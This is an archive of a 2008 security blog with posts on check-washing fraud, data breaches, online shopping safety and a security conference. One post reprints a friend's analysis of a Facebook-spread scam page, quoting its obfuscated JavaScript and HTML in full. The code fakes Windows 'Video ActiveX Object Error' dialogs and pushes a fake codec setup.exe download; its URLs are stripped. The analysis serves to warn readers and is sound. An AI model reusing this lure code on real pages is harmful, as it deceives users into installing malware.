Monday, December 29, 2008

OWASP Comment... W T F

Hey all, ordinarily I would post crap like this bud a friend sent me this over IM, so it's really his fault... .

I hit the link and I about wet myself laughing. First off, the comment demonstrates an utter lack of comprehension for the subject being berated... and don't even get me started on the unicorn and flowery background... .

Anyway - Kyle... I'd like to offer you some intelligent thoughts...but then I realized I don't like to publicly criticize people... so I'll just leave it at that.

Tuesday, December 23, 2008

Uni-Ball 207 vs. "Check Washing" ... (part 2)

First off, the response to this post has been awesome, thanks to everyone who's Google'd it, emailed it to their friends/family/co-workers, etc... Let's keep the tide of awareness going.

Thanks to Steve Gradman, Sr. Brand Manager from the Uni-Ball division of the Sanford Corp for his email reply - lots of valuable information. I guess this and the previous post has really raised more questions that I've had answers to previously, so here goes some of the things that I've questioned, and some additional answers I'm still hazy about...
  • First, if you have no idea what this is all about, you should check out this video on YouTube from FarFromBoring which demonstrates how criminals "wash" checks and other legal documents using Acetone... to remove dye-based inks. Obviously the target of this prescriptions or checks (or other legal documents) which require your signature
  • Why should you care? - If you write checks, or mail important documents (or maybe transport them somehow) you should care. Every legal document could be a target - more often than not with the aim of making money
  • Besides checks - prescriptions are another major target - doctors are you listening?
  • Just about anyone can do a "check wash"... Acetone is simple to acquire
  • So why are there still dye-based pens being sold?
  • Are there any drawbacks to pigment-based inks?
I sent an email asking for some additional information from Steve Gradman, and he was kind enough to reply here...
  1. What prompted Sanford (Uni-Ball) to pursue research in "secure" ink? It was through a number of security experts suggesting people singing their checks with a uni-ball 207 some years ago due to the pigmented ink formula that was impervious to chemical washing. That was the hallmark of our marketing on the 207 franchise which is now our number one seller. Since then we have been working to expand that formula to nearly the entire product line so people could simply think of any uni-ball with uni-super-ink as their first line of defense in protecting their assets.
  2. Can you share any market research or metrics on the incidents of "document washing" fraud with me? Check fraud about a $850 million dollar problem, criminal check washing of personal account is about a $70MM problem (according to the American Bankers Association). We still write $39Billion checks a year according to Frank Abagnale, and while that number is declining the value of each check is actually increasing.
  3. Would you say that dye-based inks are antiquated and should be replaced globally? There is still a lot of applications that benefit from dye based ink like fashion colors, fluorescent, sparkles etc, signing documents isn’t one of them.
  4. Why wouldn't Sanford (or any instrument company) convert all pens to pigmented ink? Are there draw-backs to this ink technology? There are no drawbacks but there is a lack of flexibility and color creation is much more difficult than with a dye based ink. However, a uni-ball “uni-super-ink” pigment ink is more vibrant and is fade and water resistant as well as considered archival quality vs. dye inks.
Wow - great information. If anyone has any additional information that would make sense adding to this post - please let me know and I will happily add it.


Monday, December 22, 2008

UniBall - Pen Companies vs Theft Protection

Merry Christmas everyone!

I'm sitting here on my first day of vacation, away from work but always vigilant on matters of security and identity theft... interesting where these topics creep up. As I was watching the Giants vs. Panthers last night I caught a commercial for Uni-Ball 207 pen. It caugt my attention because the actor peddling the pen was S. Epatha Merkerson (of Law & Order Fame...I think) and the topic was of course identity theft... interesting.

Interestingly enough I had to do some research into why this pen warranted my $3 (per unit), and here's what I found. This site [,9,1] has some details, and even an endorsement by Catch Me If You Can professional check fraud expert Frank Abagnale. Still, I always thought a pen was a pen, but this site will tell me otherwise.

From their fact sheet:

Helps Prevent Check Fraud:
Uni-ball 207 gel pens use specially formulated inks that contain color pigments, which are absorbed in to a check’s paper fibers. When an individual tries to “wash” the information written on the check, the ink is in effect “trapped” making the act of check fraud more difficult.

So, not all pens are created equal? I guess I wasn't aware that physical check fraud or other physical identity theft was that prevalent... sounds like something I'm going to have to do some more research into. Maybe the folks at Sanford (here in Oak Brook, IL) can shed some additional light on the subject?

Saturday, December 20, 2008

"Incidents buried in back-page press"

Article From [ ]

Published: December 20, 2008

Regional Briefs: UNCSA tells its students to monitor credit

Officials at the UNC School of the Arts say they are notifying current and former students that their names and Social Security numbers "may have been accidentally exposed" in a security breach involving a university computer server.

The server in question went online in July 2003. The security breach occurred in May of 2006 and affected about 2,700 students who were enrolled between 2003 and 2006.

Each of these students is being notified. The group includes summer-session students and 256 of the 1,162 students currently enrolled at the school.

"We have no reason to believe that the personal information was stolen, used inappropriately or even accessed," Lisa Smith, the chief information officer at UNCSA, said in a statement. "However, we are notifying the affected parties so that they might take steps to monitor their credit to ensure their identities have not been stolen."

School officials say they became aware of the breach last week. They say they are still trying to determine its cause.

The N.C. Attorney General's Office has been notified.

School officials say they are conducting tests to ensure the future safety of personal data.

Perhaps I just don't get it; and maybe I'm reading far too deep into this alleged "incident"... but if I'm a student at this school I'm furious. There are 2 highlights here that should get you thinking about how seriously loss of personal information is being taken.

Without getting on my soap-box, I'd simply like to comment that if the incident took place in May 2006, and the officials were notified last week - something is desperately wrong here. That's 2 and a half years that has passed since the breach and they're finding out about it now? Even in the most absolutely inefficiently idiotic of administrations this isn't possible. Something smells like rotting fish here.

Thwarted by YoVille

Yoville sucks... but more on that in a second.

Well, I officially started my "mandatory" 2-weeks vacation courtesy of HP today and I figured I'd start it off by converting my wife's malware-ridden WindowsXP laptop to something less security-issue-prone. Naturally I picked Ubuntu (8.10) since that's what my workstation at home (formerly Vista Ultimate) runs.....

Everything was going so well. I'd managed to convince her that this OS would be faster (which it was, booted in 30 seconds versus a minute and 30 seconds); and this OS would be more stable, more flexible, more "cool" and definitely (and most importantly, to me anyway) more secure.

Everything was rocking until she hopped on Facebook, and then went to meet some of her virtual friends on Yoville!... and that's where things went sideways.

Apparently, all the security and extensibility in the world was no match for a broken Flash 10 plug-in. Apparently, Flash 10 doesn't work so well in Ubuntu 8.10; and it breaks Yoville.

Dammit. I was so close... so close.

This undoubtedly proves my point - security without the usability of "cool" is never going to catch on.

Thursday, December 18, 2008

Breach Leads to Better Security


Call me a skeptic, but when a company that's just experienced a major data breach says "we're fixing the problem", I'm a little leery. Honestly, when Innisbrook says that as a result of a recent data breach...

"Since the incident, Innisbrook has replaced the affected servers, installed better security software and stopped storing people's credit card information entirely..."
I may believe a lot of stupid things, but I wasn't born yesterday. I wonder how much this little "incident" has cost them in lost revenue, eDiscovery, notification and other costs as result of the data breach? I think it's rather interesting that places like this start to think about security after the fact... when it's already too late.


Wednesday, December 17, 2008

Failed - The 5 Reasons Why...

Failed: Information Security and Data Protection in a Consumer Digital World by Rafal Los on 15/12/08

Hello everyone, just thought I'd take a minute to say that my paper was accepted and published on on 12/15/2008. Direct link included above for your reading pleasure

I published this myself a while back but it's nice to see it formalized and available permanently now - I continue to welcome your comments and thoughts on the paper or the topic.


Tuesday, December 16, 2008

You're [In]Secure Online

Thinking of going shopping online this holiday season? Think again.

Between the scammers, spammers, and security gaffes out there it's just not the type of environment you want to enter your credit card into. What's worse, your browser may be out to get you too! With all that risk... let's look at the real problems with transacting online this holiday season, or any other time...Link
  1. Obviously credit card companies (even the PCI certified ones) just suck at security (see this blog entry for a start:
  2. This isn't the first article to say online shopping is going to be like running blind through a mine-field (see here:
  3. Your browser (if it's IE) is going to get you hacked and you won't even know it! (see here: or google it)Link
  4. LinkBanks certainly don't seem to care all too much about security, as they have huge flaws themselves that'll allow their users to be phished or scammed (see here: or google for yourself)
So with that... why would you want to take your shopping or browsing online? Go to the stores, hit the mall, tell online retailers and your credit card companies that you refuse to be the victim in their pathetic attempt to evade having to implement good security. Take a stand!

OK, that may be a bit over-the-top, I know... but it gets my point across. Here are some simple tips for keeping yourself relatively safe online this season... (or when-ever)
  • Never, ever, ever follow a link you get in an email - if you get an email from your bank telling you to "click here to continue/login to your account" DON'T. Go to your bank's website or call their 800 number and report the incident!
  • User one-time credit card numbers - your credit card company, if they're of any value, will have this available somewhere on their website. Generating a one-time credit card number means that you're safe even if someone steals the entire database of card numbers from the PCI Certified merchant you're buying online from...
  • Never use your debit card online - ... because unlike with a credit card, your money is gone instantly ... without the ability to dispute, etc
  • Never use your debit card w/PIN - online or at a store, never, ever use your PIN number at a merchant (even at a brick-and-mortar store) because who knows how good their security is, and again (see point above) once your PIN is lost, you're hosed!
  • Stop using Internet Explorer - while this is just a good rule to follow every-day (because no good can come from using ActiveX) now it's even more critical with the serious flaw Microsoft refuses to patch (and yes, there are exploits out there right now for it)
  • Be aware - Be smart and aware of what's going on. If something doesn't seem right, close the browser (ALT + F4) and don't go back to that page...
  • Update your anti-virus - although anti-virus doesn't help much these days, make sure you're at least updated. If you want advice on the best one out there to use... Kaspersky is what I trust my (Windows) PC to... and I visit some seriously icky sites...
That's it... that's the best advice I can offer, and hopefully you'll pass this along to friends, family, and co-workers. It's vital that we stay vigilant against stupidity, companies that don't care, and foreign threats.

Merry Christmas.

Monday, December 15, 2008

Trust me, I'm your browser...

Ryan Narine over at ZDNet published an interesting article on a new story from Chapin Information Services about the security of password-storage mechanisms in your browser.
Now, I read this and immediately thought... do I even store passwords in my browser? Duh... no! But that led to a much deeper thought - I read down some of the comments people have left and came to the conclusion that most of the people that read that post missed the point entirely. Rather than looking at whether open-source Mozilla is better or closed-source MS IE is better... why aren't we looking at why in the world someone would trust their passwords to a browser. Look, there are dozens of reasons why this is a bad idea before you even start not the least of which is that no matter what the browser there has been at some point an vuln that made the security mechanism completely useless in these browsers. Aside from that the purpose of a browser, boys and girls is what? That's right, it's to render and display web-based content. It's *not* to manage passwords to web sites and applications.

This whole thing has me thinking (which is sort of dangerous around the holidays...) why someone hasn't written a BHO or Mozilla plug-in that masquerades as a "password manager" and simply steals all your passwords (all your passwords are belong to teh hax0r). Oh... no, wait - that's been done.

Sunday, December 14, 2008

CSIS Takes 16 Months to Research Obvious

On December 8th, 2008 the Center for Strategic and International Studies (CSIS) released a report titled "Securing Cyberspace for the 44th Presidency"
"...that recommends that President-elect Obama establish a new National Office for Cyberspace in the Executive Office of the President and appoint a new assistant for cyberspace to run that office."

As I read that on GSN Magazine's online site I couldn't help but think to myself... duh? The report proposes a merging of the existing National Cyber Security Center and the Joint Inter-Agency Cyber Task Force - and work for the National Security Council. The new office would be called the National Office for Cybersecurity (NOC)... This report makes a few interesting points...
  1. I can't believe it takes a group of intelligent people 16 months to make this recommendation
  2. Cyber Security is finally going to be taken seriously at the National Security Council level
  3. It's taken incident after incident for our government to take cyber security seriously
  4. The BSA jumped in immediately after the report was released... and agered (??)
  5. The report recommends the government only buy "secure" products and services - but notes that those standards are yet to be developed...
  6. The NOC (National Office of for Cyberspace) should be working with NIST (National Institute for Standards and Technology) to protect SCADA systems powering America's critical infrastructure
Incredibly, those of us who have been working in information security for years could have probably made these points and similar recommendations with about 5 seconds of thought... not 16 months of research. Again... an excellent waste of time to make an obvious point.

Friday, December 12, 2008

Security Philosophy: What does it all mean?

Hey folks - I know it's basically the weekend and I should be headed out but it's been an insane 2 weeks at the office and I just have to get some stuff out of my brain and onto this blog before it falls out to make room for other crap.

This post isn't so much a rant as it is a philosophical approach to a long career protecting IT assets in the field known as IT Security.

Since 1999 I've been working and learning IT Security. Over the years my thinking has evolved from purely seeing things in black and white to a rainbow of shades of gray. I have a few key points here now for your consideration...
  • Security is shades of gray. Over the years I've learned that I cannot give a real answer to the question: Is this asset secure? The reason I can't say yes ever, is because I'd be lying. You security pragmatists know exactly what I'm talking about. We've consistently failed to make an impact to management because we just can't answer the "am I secure yet?" question. The answer is always no.
  • Security isn't an end-game. We're never going to reach a state within our respective arenas whether that's where you work, or where you consult, where we've "won". The bad guys are always going to keep coming, there will be new holes to fill tomorrow, and new security challenges. Most of us see that as a glass half-full because (a) we'll never be out of a job and (b) we've always got something new to do... but it's tiring knowing you're never going to get there.
  • The business doesn't actually care. I've said it. Poll just about any business leader out there and they'll tell you they're doing many things to secure their customer and themselves from hackers. Dig into that or sit in on a project meeting from the inside... and you quickly realize that's crap. Sure, they're willing to invest heavily in security as long as it's unobtrusive, simple, and free. My colleague Russ McRee over at continually proves that banks, of all verticals, posture themselves as having great security - but in actuality care very very little.
  • It's nearly impossible to measure good security. Isn't that the sad truth? Good security is nearly impossible to measure. How can you tell your upper-management that today you stopped a hacker from stealing a million credit cards from your database? You can't. You can't even say with any reasonable certainty that you've ever done that. We're all selling life insurance folks, hoping the patient doesn't die before we get a chance to cash our paychecks.
This brings me to the main point I've been building up to... and I hope it's almost obvious at this point. I've been asking myself lately... what is it that I've accomplished? Have I made the world a safer place by tirelessly fighting the corporate machine to be more security-minded? Have I moved that needle at all? I'd like to think that I have, and I'd like to say that between the awareness & evangelization, project work in corp. america, and my personal crusades I've changed at least a few important people's minds to be more security conscious. But how do I measure that? The sales folks at my day job measure their success by the dollar revenue they generate for the company... how do I measure my worth to my employer? How do any of us?

I know what you're thinking, what a way to start a weekend... but it's been building over the past several months and I've got some research coming soon that'll help make me feel a little better. Stay tuned. And don't let your job drive you to drinking :)

SFO Airport - Security Assessment RFP

In case anyone out there is interested, San Francisco Airport has issued a RFP for a full-scale assessment of all of their physical and digital security measures. I think I find it interesting that the expected price tag is around $375,000 over the course of the engagement. That's a lot of money to spend, but absolutely necessary.

I've flown through SFO a time or two, and believe me they're going to find a trove of security vulnerabilities in that airport... assuming they can get through the ridiculous lines and terrible inefficiencies of that place.


Thursday, December 4, 2008

Ronald McDonald Goes Rogue

CyberINSecure is running a story that just made me laugh. Some scammers are preying on stupid McDonald's users...

It's not that the first page is suspect - because it looks like a legitimate survey. It's the 2nd page that has me baffled. What retarded monkey would enter their credit card information like this? I mean, if someone's going to offer you money to take a survey, why in the world would they want your credit card number and information [and PIN]?! Unreal....

Wednesday, December 3, 2008

Santa's GMail Hacked - Is *nothing* sacred?

This screen shot says it all... although I suspect it's a mock-up given the convenient placement of advertisements, emails, and gTalk messages.

Funny nonetheless, and appropriate for the season.

Tuesday, December 2, 2008

Yes - they ARE out to get you

Folks, if you've missed this (or don't read DarkNet regularly) you need to see this. Yes, people *are* out to get you ... well, your browser more specifically. There have been browser exploitation frameworks in the past, true, but this release of Browser Rider is aiming to be the Cadillac of browser exploitation (minus the annoying bongs... Top Gear reference).

Check out Browser Rider - Web Exploitation Framework...

And if you REALLY want to freak yourself out... check out the demo, middle-bottom of the page. Yea... it's bad.

Monday, December 1, 2008

Friends Don't Let Friends Hack... and Do Drugs

... and this is exactly why:

Whiskey Tango Foxtrot?!

I'm not sure who should be redder (more red?) in the face -Luxottica Retail or the "hacker". First off... if you're Luxottica you've got huge problems... and not because someone just stole data although that would appear to be a problem in itself. No, you have problems because they stole if off your mainframe... which should be buried deep within the annals of your company's security onion. Look, one of two situations are true. Either the company has terrible security and allows "outsiders" to ride their virtual rails straight to mainframe equipment (which is deplorable), or they had (gulp) a mainframe attached to a web page somewhere - which should have them brought up on charges... of stupidity for one thing. The situation is unclear on whether this was a web application hack, but if it was - wowza! I've been in several environments where a mainframe is just a screen-scraper-appliance away but those systems have to be rigerously controlled and are generally installed by default to be stupid-resistant. I'm not even going to guess at the exact cause until it's announced (if it ever is, which I doubt) - but this next quote has me on the floor laughing...
"A routine check by the information technology department discovered that a
hacker had been inside a computer mainframe and downloaded the personal
information of more than 59,000 former workers."

Obviously it wasn't routine enough, eh?

As for the "Heroin Hacker"... wow. Brings the phrase "Out in a Blaze of Glory" to new heights huh?

Sunday, November 30, 2008

All-Time Best 404

Hope you're all having a good close to the long weekend...

I just had to share this. As I'm reading some posts and catching up from being off my computer for the last 2 days or so... I hit this on accident:

This is perhaps the best 404 ever.

Wednesday, November 26, 2008

Thanksgiving 2008...Give Thanks and Be Grateful

Happy Thanksgiving everyone, first and foremost.

Now let's get to it. Given that you're probably reading this on your day off, expecting family over or headed out yourself I will keep it short.

Thanksgiving Day here in the United States brings us to the thought of family, charity - and generally giving thanks for the blessings and good fortune in our lives. This year, on the eve of the US holiday, Mumbai was attacked by terrorists, and held hostage. From what I've been able to gather from news reports, view interviews and feeds and articles the whole attack was perpatrated by several people with a relatively low-tech attack. While the attacks were low-tech they were precise, deadly, and make no mistake... locked dow the entire city of Mumbai and killed at least 20, and injured at least 900. As the toll rises, I can't help but think of the ramifications for security and the blistering speed of "westernization" that India is undergoing.

I can't even begin to guess the percentage of companies that have data, infrastructure, and people over in India who will be impacted by this incident. The ramifications are much severe than the burned buildings and the hotels, cafes, and tourist spots leveled. There was a significant loss of life - but think of it this way - how easy was this?! From every report I've been able to find these attacks were simple to execute, and inflicted maximal damage with relatively little firepower. How protected is your physical and intellectual property overseas? Terrorism isn't just about killing people (although sometimes you wouldn't notice) but it's about disrupting Western life. Taking out a few major data centers, development centers, and IT centers in India would absolutely devastate many Western companies that are heavily outsourced into India and beyond.

So this Thanksgiving holiday... ask yourself how insulated your company is from catastrophic issues in the event this attack in Mumbai was just a pre-cursor to something much, much bigger.

Try not to choke on that turkey leg.


Sunday, November 23, 2008

A Perspective on National Security

My newswire inbox has been flooded over the past few days with articles about President-elect Obama's phone records being breached by unknown Verizon Wireless employees.

Then there was the matter of Sarah Palin's Yahoo! email being hacked (actually, password-hint guessed) which took center stage right as the election started to heat up down the stretch...

... and McCain and Obama's websites were hacked during the course of the election, multiple times as a matter of claims.

This brings me to what I want to draw your attention to - national security.  At which point in these data breaches did we cross over into a threat to national security?

Some would argue it happened when Palin's email was "hacked into"... possibly - but you have to ask yourself what sort of twit would discuss matters of national security over public webmail!

Others have tried to argue that Obama or McCain's sites being hacked was a matter of national security ... please, seriously?

This brings me to the matter of Obama's cell phone records being snooped.  Depending on which version of the story you believe, one of Obama's people says that the cell phone that was snooped on hadn't been used for a while, OK - but work with me on this one.  Cell phone records (numbers called, if voicemail was left, and such) are a dangerous tool.  Imagine if someone knew who you called - they could certainly use that to say, blackmail you, once you were in a position of power.  Call me a conspiracy theorist, but I'd say this could be a far more dangerous situation and requires Secret Service attention... not the rediculous things them and the FBI have been chasing lately.

You have to wonder... is our notion of national security in the digital realm as well-focused as it should be?  Do we properly understand the threats?  Furthermore, does our government, the people who send the big guns and write the laws, have the proper grasp technology that it should?

My obvious answer would be ... no.  So to the incoming President - please hire someone with a clue?

As a cynical side-note, someone identified as "Jeff" left this comment:

November 21st, 2008 9:54 pm ET

With all the wiretappings going on via Bush's WOT, why didn't Homeland Security discover this?

---Good one Jeff.

Tuesday, November 18, 2008

CSI Conference 2008 - Notes

Hey folks, in my other blog I published an entry of notes from the App Sec Summit, CSI Annual Conference here in Washington, DC.

Please give it a read, as it's a lot simpler to cross-post a link rather than re-writing the blog entry all over again.

Check it out!

Monday, November 17, 2008

CSI 2008 - First Thoughts

So... my first impressions of this Computer Security Institute [CSI] 2008 conference here in National Harbor, MD - as follows:

  • Lots of people are here from all sorts of companies, and of all kinds of ranks, from all over the Americas (I saw name tags from Canada as well as the US; with CISOs, architects and engineers present)

  • The F5 "Email Station" kiosks - essentially a bunch of laptops which you can check email from. Seriously? At a security conference? And yes... there were people walking up and using webmail on these laptops. More proof that even with our own ranks, security people aren't paranoid enough - think keyloggers!

The morning's keynote was given in part by Brian Snow, of NSA fame. He had some bulletpoints I think would be good take-aways for everyone, my commentary is included:
  • "Better security" isn't a product we can sell to people, so it isn't happening effectively. Companies are in the business of making products (and selling them) and not securing you/us.

  • "Solving ahead" is a design process step by which we address all conceivable possible attacks against a "thing" before that thing is sent off for production. This process involves thinking many steps ahead of the initial attack and requires some smart people during the design phases... do you have those at your company?

  • An interesting topic (although not a new one) was brought back up about minimizing the contextual value of data - meaning, data stolen from one domain needs to be without value in another domain. How do we solve this issue? Credit card companies are already doing this with one-time use credit card numbers... what about other data?

  • Designers of software/hardware/stuff allow for bad decisions to be made by end-users. Why? This is a lot tougher to root out than you may think, people want those 'bad choices' in their options.

  • Learn to speak executive. If you don't have the ability to translate our "security geek" language into execu-speak you're going to continue to fail to make your point.

As a side note... are you an INTJ? How does that affect the way you design and solve problems? Think about it.

More soon...

Sunday, November 16, 2008

Nov 17th - CSI Conference

Hey everyone, as you read this I'll be attending the CSI Conference in National Harbor, MD.

Over the next 3 days I'll cover the conference, and some of the events, sessions and discussions that take place. This year promises to be one that we address how to fix some of the issues we've uncovered over the course of the past year or so. I was invited by Robert Richardson since I've been complaining publicly about the lack of "so now what" solutions to the problems we face and find.

Stay tuned, if you can't be here, hopefully I'll be able to convey some good information.

In the mean time, check out this weird case of Identity Theft uncovered in upstate New York. This has got to be one of the strangest [undated] "hacks" I've heard of recently. Hacking eBay isn't a new concept, neither is identity theft... but I thought this was rather clever.


Sunday, November 9, 2008

Facebook Worm/Hack Follow-Up...

If you haven't read the previous post on the FaceBook "email hack/possible worm", you can read it here first.

In response to the post, my friend Rob Ragan was kind enough to spend some of his time dissecting it and provided further analysis... Here is that analysis. Thanks to Rob for this.


Some googling after disecting the info below yielded this:

Writes out
{script src="" /}

which contains

Which then gives a 302 redirect to

Which has an iframe like so
{IFRAME src="" height="100%" width="100%" border="0"}
Which gives us a final destination of
and this screen shot.

Thanks to all this:
{script language="javascript" src=""}{/script}
{script language="javascript" src=""}{/script}
{script language="jscript.encode" src=""}{/script}

{html lang="en-EN"}
{meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /}
body,td,th,tr,a,img {cursor:default;}
#mainbody {background-color:#000;}
#movie {border:1px solid #fff;}
#movie a {cursor:pointer;}
?function detecting(){
var testObject = new ActiveXObject("mu"+"lti"+"me"+"di"+"aCo"+"ntro"+"ls.c"+"hl");
return true;

return false;

function releaseMovie() {
if (detecting()) {
document.getElementById('playMov').innerHTML = '{embed src="" width="480" height="400" autostart="true" type="movie/mpg"}{/embed}';
}function codecDownload()
if (window.navigator.userAgent.indexOf("SV1") != -1 || window.navigator.userAgent.indexOf("MSIE 7") !=-1) {
else {
window.setTimeout("location.href=''", 3000);

{body id="mainbody"}{script}

var transcode = new Array;
window.transcode[0] = 'V'+'i'+'d'+'eo Act'+'iv'+'eX Obj'+'ect E'+'r'+'ror.\n\nY'+'o'+'ur brow'+'ser ca'+'nnot pl'+'a'+'y this vi'+'de'+'o file.\nCli'+'ck \'OK\' to dow'+'nlo'+'ad an'+'d install mis'+'sing V'+'id'+'eo Act'+'ive'+'X O'+'bj'+'ec'+'t.';
window.transcode[1] = 'Pl'+'e'+'as'+'e ins'+'ta'+'ll ne'+'w ve'+'rs'+'i'+'on of V'+'id'+'e'+'o Ac'+'ti'+'ve'+'X Ob'+'je'+'ct.';
window.transcode[2] = 'Yo'+'u m'+'us'+'t do'+'wn'+'lo'+'ad V'+'id'+'eo A'+'ct'+'iv'+'eX O'+'bject t'+'o pl'+'ay th'+'is v'+'ideo f'+'ile.';




var Drag = {
obj : null,
init : function(o, oRoot, minX, maxX, minY, maxY, bSwapHorzRef, bSwapVertRef, fXMapper, fYMapper)
o.onmousedown = Drag.start;

o.hmode = bSwapHorzRef ? false : true ;
o.vmode = bSwapVertRef ? false : true ;

o.root = oRoot && oRoot != null ? oRoot : o ;

if (o.hmode && isNaN(parseInt( ))) = "0px";
if (o.vmode && isNaN(parseInt( ))) = "0px";
if (!o.hmode && isNaN(parseInt( ))) = "0px";
if (!o.vmode && isNaN(parseInt( = "0px";

o.minX = typeof minX != 'undefined' ? minX : null;
o.minY = typeof minY != 'undefined' ? minY : null;
o.maxX = typeof maxX != 'undefined' ? maxX : null;
o.maxY = typeof maxY != 'undefined' ? maxY : null;

o.xMapper = fXMapper ? fXMapper : null;
o.yMapper = fYMapper ? fYMapper : null;

o.root.onDragStart = new Function();
o.root.onDragEnd = new Function();
o.root.onDrag = new Function();

start : function(e)
var o = Drag.obj = this;
e = Drag.fixE(e);
var y = parseInt(o.vmode ? :;
var x = parseInt(o.hmode ? : );
o.root.onDragStart(x, y);

o.lastMouseX = e.clientX;
o.lastMouseY = e.clientY;

if (o.hmode) {
if (o.minX != null) o.minMouseX = e.clientX - x + o.minX;
if (o.maxX != null) o.maxMouseX = o.minMouseX + o.maxX - o.minX;
} else {
if (o.minX != null) o.maxMouseX = -o.minX + e.clientX + x;
if (o.maxX != null) o.minMouseX = -o.maxX + e.clientX + x;

if (o.vmode) {
if (o.minY != null) o.minMouseY = e.clientY - y + o.minY;
if (o.maxY != null) o.maxMouseY = o.minMouseY + o.maxY - o.minY;
} else {
if (o.minY != null) o.maxMouseY = -o.minY + e.clientY + y;
if (o.maxY != null) o.minMouseY = -o.maxY + e.clientY + y;

document.onmousemove = Drag.drag;
document.onmouseup = Drag.end;

return false;

drag : function(e)
e = Drag.fixE(e);
var o = Drag.obj;

var ey = e.clientY;
var ex = e.clientX;
var y = parseInt(o.vmode ? :;
var x = parseInt(o.hmode ? : );
var nx, ny;

if (o.minX != null) ex = o.hmode ? Math.max(ex, o.minMouseX) : Math.min(ex, o.maxMouseX);
if (o.maxX != null) ex = o.hmode ? Math.min(ex, o.maxMouseX) : Math.max(ex, o.minMouseX);
if (o.minY != null) ey = o.vmode ? Math.max(ey, o.minMouseY) : Math.min(ey, o.maxMouseY);
if (o.maxY != null) ey = o.vmode ? Math.min(ey, o.maxMouseY) : Math.max(ey, o.minMouseY);

nx = x + ((ex - o.lastMouseX) * (o.hmode ? 1 : -1));
ny = y + ((ey - o.lastMouseY) * (o.vmode ? 1 : -1));

if (o.xMapper) nx = o.xMapper(y)
else if (o.yMapper) ny = o.yMapper(x)[o.hmode ? "left" : "right"] = nx + "px";[o.vmode ? "top" : "bottom"] = ny + "px";
Drag.obj.lastMouseX = ex;
Drag.obj.lastMouseY = ey;

Drag.obj.root.onDrag(nx, ny);
return false;

end : function()
document.onmousemove = null;
document.onmouseup = null;
Drag.obj.root.onDragEnd( parseInt([Drag.obj.hmode ? "left" : "right"]),
parseInt([Drag.obj.vmode ? "top" : "bottom"]));
Drag.obj = null;

fixE : function(e)
if (typeof e == 'undefined') e = window.event;
if (typeof e.layerX == 'undefined') e.layerX = e.offsetX;
if (typeof e.layerY == 'undefined') e.layerY = e.offsetY;
return e;

function Downloadings(download,e)
if (e!=null && e.keyCode==27)
{ Close();
switch (download)
case "iax": document.location.href=""; break;


function tracking() {
if (confirm(window.transcode[0])) {
else {
if (alert(window.transcode[1])) {
else {

function Close()
var p=document.getElementById("popdiv");"hidden";
function Details()


{div name="popdiv" id="popdiv" onKeyPress="Downloadings('iax',event);" style="visibility:hidden; z-index:1;position:absolute;top:0px;left:0px;"}
{table width="474" cellpadding="0" cellspacing="0"}
{td height="28" width="8" style="background-image:url(/img/vista-ltc.gif);"}{/td}
{td height="28" width="458" style="background-image:url(/img/vista-bgtop.gif);"}
{table width="458" cellpadding="0" cellspacing="0"}
{td style="font-size: 12px; font-family:Segoe UI; color: #000000; padding-top:5px; padding-left: 6px;" id="w_title"}{/td}
{script} document.getElementById('w_title').innerHTML = "V"+"ide"+"o Ac"+"tiv"+"eX Ob"+"je"+"ct Er"+"ro"+"r.";{/script}
{td width="28" style="padding-top:6px; padding-right: 2px;"}{img src="/img/vista-close.gif" width="28" height="15" border="0" onClick="Close();" style="cursor:default;" /}{/td}
{td height="28" width="8" style="background-image:url(/img/vista-rtc.gif);"}{/td}
{td width="8" style="background-image:url(/img/vista-bgleft.gif);"}{/td}
{td width="458" style="background-image:url(/img/vista-1x1.gif);"}
{table width="458" cellpadding="0" cellspacing="8" style="padding-top:18px; padding-bottom:18px; background-image:url(/img/vista-1x1.gif);" align="center"}
{td width="32" style="padding-left: 18px; vertical-align: top;"}{img src="/img/vista-alert.gif" width="32" height="32" border="0" /}{/td}
{td style="font-size: 12px; font-family:Segoe UI; text-align:justify; padding-left: 4px; padding-right: 20px;" id="w_content"}
{script} document.getElementById('w_content').innerHTML = "Your bro"+"wser ca"+"nnot dis"+"play th"+"is vi"+"deo fi"+"le. You nee"+"d to dow"+"nload new "+"vers"+"ion of Vid"+"eo Ac"+"tiveX O"+"bject to play "+"this "+"video "+"file.{"+"br}{"+"br}You need"+" to do"+"wnload new"+" vers"+"ion of Vid"+"eo Ac"+"tiveX Obje"+"ct to p"+"lay th"+"is v"+"ideo f"+"ile.";{/script}
{table width="458" height="52" cellpadding="0" cellspacing="0" style="background-color: #f0f0f0;padding-right: 8px;"}
{table align="right" cellpadding="4" cellspacing="0"}
{td}{input type="button" value="Continue" onClick="Downloadings('iax');" style="font-size:12px; font-family:Segoe UI; height:24px; width:91px;" tabindex="1" ID="Button1" NAME="Button1"}{/td}
{td}{input type="button" value="Cancel" onClick="Close()" style="font-size:12px; font-family:Segoe UI; height:24px; width:91px;" ID="Button3" NAME="Button3"}{/td}
{td}{input type="button" value="Details..." onClick="Details()" style="font-size:12px; font-family:Segoe UI; height:24px; width:91px;" ID="Button3" NAME="Button3"}{/td}
{td width="8" style="background-image:url(/img/vista-bgright.gif);"}{/td}
{td height="8" width="8" style="background-image:url(/img/vista-lbc.gif);"}{/td}
{td height="8" width="458" style="background-image:url(/img/vista-bgbottom.gif);"}{/td}
{td height="8" width="8" style="background-image:url(/img/vista-rbc.gif);"}{/td}
if (navigator.userAgent.indexOf("Firefox")!=-1) {
if (detecting()) { } else {
setTimeout("Close();", 1000);
else {
if (detecting()) { } else {

function showPopDiv()
var sFlag = "No";
var byFlag = false;
var FlagAr = sFlag.split("");

if (FlagAr[0]=="1"){byFlag = true;}
if (FlagAr[0]=="3"){byFlag = true;}

if(!byFlag) {
var p=document.getElementById("popdiv");
wmpheight=document.body.clientHeight/2-120; = wmpheight; = wmpwidth; = "visible";


{table id="movie" align="center" cellpadding="0" cellspacing="0"}{tr}{td id="playMov"}{a href=""}{img width="450" style="cursor:pointer;" onMouseOver="window.status = window.transcode[2];" height="369" border="0" alt="You must download Video ActiveX Object to play this video file." src="/img/mov.gif"/}{/a}{/td}{/tr}{/table}


Final Word:
Wow! Thanks Rob for that analysis... Looking through all that code, redirects and mis-direction you can clearly see the final result is an attempt to get the user to install some setup.exe file, as a "missing codec" for whatever video you are presumably being redirected to. Fascinating! If anyone has been able to grab that setup.exe file please let me know, I have not been able to get it to download properly as of this morning.

Saturday, November 8, 2008

FaceBook Worm? Hack? or Worse?

Greetings from frigid Chicago!

